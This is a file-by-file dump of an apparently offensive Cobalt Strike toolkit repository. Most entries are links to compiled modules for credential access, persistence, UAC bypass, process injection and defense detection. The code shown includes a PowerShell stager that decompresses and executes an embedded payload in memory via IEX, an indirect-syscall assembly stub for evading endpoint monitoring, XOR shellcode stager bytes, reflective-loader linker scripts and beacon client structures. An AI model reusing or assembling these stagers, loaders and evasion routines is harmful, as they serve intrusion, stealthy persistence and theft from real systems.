CSAgent/target/classes/gca/GoogleCSAgent.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/classes/gca/GoogleCSAgent.class
-------------------------------------------------------------------------------- /Cobatl Strike/Mory/utils/mimes.js: -------------------------------------------------------------------------------- 1 | export default { 2 | 'jpg': 'image/jpeg', 3 | 'png': 'image/png', 4 | 'gif': 'image/gif', 5 | 'svg': 'image/svg+xml', 6 | 'psd': 'image/photoshop' 7 | }; 8 | -------------------------------------------------------------------------------- /Cobatl Strike/Sweet Potato CS/app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/asr_status/asr_status.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/asr_status/asr_status.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/wsc_status/wsc_status.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-message-CS.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-message-CS.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/locate-example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/locate-example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/output/payload_x64_blob.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/output/payload_x64_blob.enc -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_dll/beacon_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_exe/beacon_exe.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 
-------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/clipboard_grab/clipboard_grab.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/cred_access/clipboard_grab/clipboard_grab.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/aad_ca_policy/aad_ca_policy.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/env_assessment/aad_ca_policy/aad_ca_policy.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/metadata/struct.go: -------------------------------------------------------------------------------- 1 | package metadata 2 | 3 | type Metadata struct { 4 | userName string 5 | procName string 6 | hostName string 7 | ClientId uint32 8 | 9 | EncMetadata string 10 | } 11 | 
-------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/File-Color-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/File-Color-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Web-Hit-Example1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Web-Hit-Example1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/Exitservice/uinit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/Exitservice/uinit.exe 
-------------------------------------------------------------------------------- /Cobatl Strike/Venoma/Kobra/Kobra.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_common/beacon_common.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_service/beacon_service.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobalt Strike Toolset/AggressorScript/nopowershell/scripts/NoPowerShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Toolset/AggressorScript/nopowershell/scripts/NoPowerShell.exe -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-Client-Disconnect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-Client-Disconnect.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Discord-Linux-Parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Discord-Linux-Parser.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike 
Aggressor Kit/Pictures/Host-File-Clone-Site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Host-File-Clone-Site.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Keystrokes-Received.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Keystrokes-Received.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Beacon-Example1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Beacon-Example1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Screesnhot-taken.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Screesnhot-taken.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/linux-parser-example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/linux-parser-example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike 
CNA/Persistence/Modules/AdUserApi/HaryyUser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/AdUserApi/HaryyUser.exe -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | gca/GoogleAuthenticationTool.class 2 | gca/GoogleCSAgent$DefineTransformer.class 3 | gca/GoogleCSAgent.class 4 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/cmd/main/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "belin/internal" 5 | "log" 6 | ) 7 | 8 | func main(){ 9 | err := internal.Init() 10 | if err != nil { 11 | log.Println(err.Error()) 12 | } 13 | } -------------------------------------------------------------------------------- /Cobatl Strike/Bypass UAC/Aggressor-Scripts-master/UACBypass/ExampleAudit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Bypass UAC/Aggressor-Scripts-master/UACBypass/ExampleAudit.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor 
Kit/Pictures/CWD-Beacon-Bar-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Process-Color-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Process-Color-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/windows-parser-example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/windows-parser-example.png -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/dazzleUP.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/classes/gca/GoogleAuthenticationTool.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/classes/gca/GoogleAuthenticationTool.class -------------------------------------------------------------------------------- /Cobatl Strike/SilenceSysmon/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc 
silencesysmon.c 4 | move /y silencesysmon.obj silencesysmon.o 5 | dumpbin /disasm silencesysmon.o > silencesysmon.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/loader.cna: -------------------------------------------------------------------------------- 1 | # Automatically loads all aggressor scripts. 2 | # Idea taken from Und3rf10w 3 | 4 | include(script_resource("elevate/elevate.cna")); 5 | include(script_resource("persistence/persistence.cna")); -------------------------------------------------------------------------------- /Loader/Titan Ldr/SectionLink.ld: -------------------------------------------------------------------------------- 1 | SECTIONS 2 | { 3 | .text : 4 | { 5 | *( .text$A ) 6 | *( .text$B ) 7 | *( .text$C ) 8 | *( .text$D ) 9 | *( .text$E ) 10 | *( .rdata* ) 11 | *( .text$F ) 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/applocker_policy/applocker_policy.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/env_assessment/applocker_policy/applocker_policy.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/bitlocker_status/bitlocker_status.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/env_assessment/bitlocker_status/bitlocker_status.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-All-Tabs-Bold-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-All-Tabs-Bold-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Spray AD/Src/Spray-AD/Spray-AD/Spray-AD.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Loader/Doge Loader/local/txt/xor/stager.txt: -------------------------------------------------------------------------------- 1 | 
\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83 -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/window_handles_enum/window_handles_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/cred_access/window_handles_enum/window_handles_enum.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-Admin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-Admin.png -------------------------------------------------------------------------------- /Cobatl Strike/DllEnvHijacking/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllenvhijacking.c 4 | move /y dllenvhijacking.obj dllenvhijacking.o 5 | dumpbin /disasm dllenvhijacking.o > dllenvhijacking.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/OperatorsKit/compile-all.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | for /r %%i in (*.bat) do ( 4 | if "%%i" neq "%~f0" ( 5 | echo Running %%i 6 | pushd "%%~dpi" 7 | call "%%i" 8 | popd 9 | ) 10 | ) -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Auto-Sleep-Interactive-Example.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Auto-Sleep-Interactive-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Colors-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Colors-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-CS-Client-Connect-Example1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-CS-Client-Connect-Example1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Teams-CNA-Linux-Parser-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Teams-CNA-Linux-Parser-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/classes/gca/GoogleCSAgent$DefineTransformer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/classes/gca/GoogleCSAgent$DefineTransformer.class -------------------------------------------------------------------------------- 
/Loader/HellLoader/HellsGate/HellsGate/HellsGate/HellsGate.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/FileControler/FileControler_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/FileControler/FileControler_x64.dll -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_spawn.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_spawn.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_explicit.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_explicit.x64.o -------------------------------------------------------------------------------- /Cobalt Strike Toolset/Kits/ResourceKit/compress.ps1: 
-------------------------------------------------------------------------------- 1 | $s=NEw-Object IO.MemoryStream(,[Convert]::FromBase64String("%%DATA%%"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 2 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0) 2 | 3 | project(rtty C) 4 | 5 | list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/Modules/") 6 | 7 | #set(CMAKE_VERBOSE_MAKEFILE ON) 8 | 9 | add_subdirectory(src) 10 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Cobatl Strike/Enable WebDAV Client BOF/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | x86_64-w64-mingw32-gcc -c EnableWebDAVClient.c -masm=intel -Wall -DBOF -o EnableWebDAVClient.o 3 | x86_64-w64-mingw32-strip --strip-unneeded EnableWebDAVClient.o 4 | clean: 5 | rm EnableWebDAVClient.o -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/LinkOrder.ld: -------------------------------------------------------------------------------- 1 | SECTIONS 2 | { 3 | .text ALIGN( 1 ) : SUBALIGN( 1 ) 4 | { 5 | *( .text$A ) 6 | *( .text$B ) 7 | *( .text$C ) 8 | *( .text$D ) 9 | *( .text$E ) 10 | *( .rdata* ) 11 | *( .text$F ) 12 | } 13 | } 
-------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/pipe.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) HANDLE PipeInit( PAPI pApi, PCHAR Name ); 4 | SECTION( E ) BOOL PipeWait( PAPI pApi, HANDLE Pipe ); 5 | SECTION( E ) BOOL PipePrint( PAPI pApi, HANDLE Pipe, PCHAR Format, ... ); 6 | -------------------------------------------------------------------------------- /Profile/Malleable Profiles/sleepmask-vs/BOF-Template/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/encrypt/struct.go: -------------------------------------------------------------------------------- 1 | package encrypt 2 | 3 | import "crypto/rsa" 4 | 5 | type Enc struct { 6 | IV []byte 7 | GlobalKey []byte 8 | AesKey []byte 9 | HmacKey []byte 10 | 11 | RsaPubl *rsa.PublicKey 12 | RsaPriv *rsa.PrivateKey 13 | } -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/requester/struct.go: -------------------------------------------------------------------------------- 1 | package requester 2 | 3 | import "net/http" 4 | 5 | type ReqProfile struct { 6 | GETURL string 7 | PSTURL string 8 | Agent string 9 | 10 | Count int 11 | 12 | Client *http.Client 13 | Req *http.Request 14 | } -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x64.lib 
-------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x86.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x86.lib -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/idletime.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | DECLSPEC_IMPORT BOOL WINAPI USER32$GetLastInputInfo(PLASTINPUTINFO plii); 4 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(void); 5 | WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/SleepObfLoader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Process Inject Kit/process-inject-explicit/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | /root/Music/mygithub/GoogleCSAgent_cdf/src/main/java/gca/GoogleCSAgent.java 2 | /root/Music/mygithub/GoogleCSAgent_cdf/src/main/java/gca/GoogleAuthenticationTool.java 3 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor 
Kit/Auto/auto-sleep-interactive-for-testing.cna: -------------------------------------------------------------------------------- 1 | #Author: @nickvourd 2 | 3 | on beacon_initial { 4 | local('$bid'); 5 | $bid = $1; 6 | 7 | bsleep($1, 0); 8 | 9 | blog($1, "Setting sleep interval to 0"); 10 | } 11 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/link.ld: -------------------------------------------------------------------------------- 1 | SECTIONS 2 | { 3 | .text : 4 | { 5 | *( .text$A ) 6 | *( .text$B ) 7 | *( .text$C ) 8 | *( .text$D ) 9 | *( .text$E ) 10 | *( .rdata* ) 11 | *( .text$F ) 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/dazzleUP_Reflective_DLL/dazzleUP_Reflective_DLL/dazzleUP_Reflective_DLL.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Venoma/Kobra/syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | extern syscallID : DWORD 4 | extern syscallAddr : QWORD 5 | 6 | public indirect_sys 7 | 8 | indirect_sys PROC 9 | mov r10, rcx 10 | mov eax, syscallID 11 | jmp QWORD PTR [syscallAddr] 12 | indirect_sys ENDP 13 | 14 | END -------------------------------------------------------------------------------- /Cobalt Strike Toolset/Kits/ResourceKit/htmlapp2.txt: -------------------------------------------------------------------------------- 1 | 11 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/go.mod: -------------------------------------------------------------------------------- 1 | module belin 2 | 3 | go 1.23.2 4 | 5 | require ( 6 | github.com/jkeys089/jserial v1.0.1 7 | github.com/lujjjh/go-javaio v0.2.7 8 | ) 9 | 10 | require ( 11 | 
github.com/pkg/errors v0.8.1 // indirect 12 | golang.org/x/exp v0.0.0-20250106191152-7588d65b2ba8 13 | ) 14 | -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Notifier Discord/request.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | 4 | #Change webhook here 5 | webhookurl = "XXXXXXXXXXXXX" 6 | data = {"content": str(sys.argv[1])} 7 | response = requests.post(webhookurl, json=data) 8 | print(response.status_code) 9 | print(response.content) 10 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/bof/start.asm: -------------------------------------------------------------------------------- 1 | [SEGMENT .text] 2 | 3 | %ifidn __OUTPUT_FORMAT__, win32 4 | GLOBAL _BofMain 5 | _BofMain: 6 | incbin "bin/HiddenDesktop.x86.bin" 7 | %else 8 | GLOBAL BofMain 9 | BofMain: 10 | incbin "bin/HiddenDesktop.x64.bin" 11 | %endif 12 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Labels.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | static ULONG_PTR Start( VOID ); 14 | static ULONG_PTR GetIp( VOID ); 15 | static ULONG_PTR Hooks( VOID ); 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Killer/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Cobatl Strike/Log Striker/requirements.txt: -------------------------------------------------------------------------------- 1 | # LogStriker Dependencies 2 | # No external 
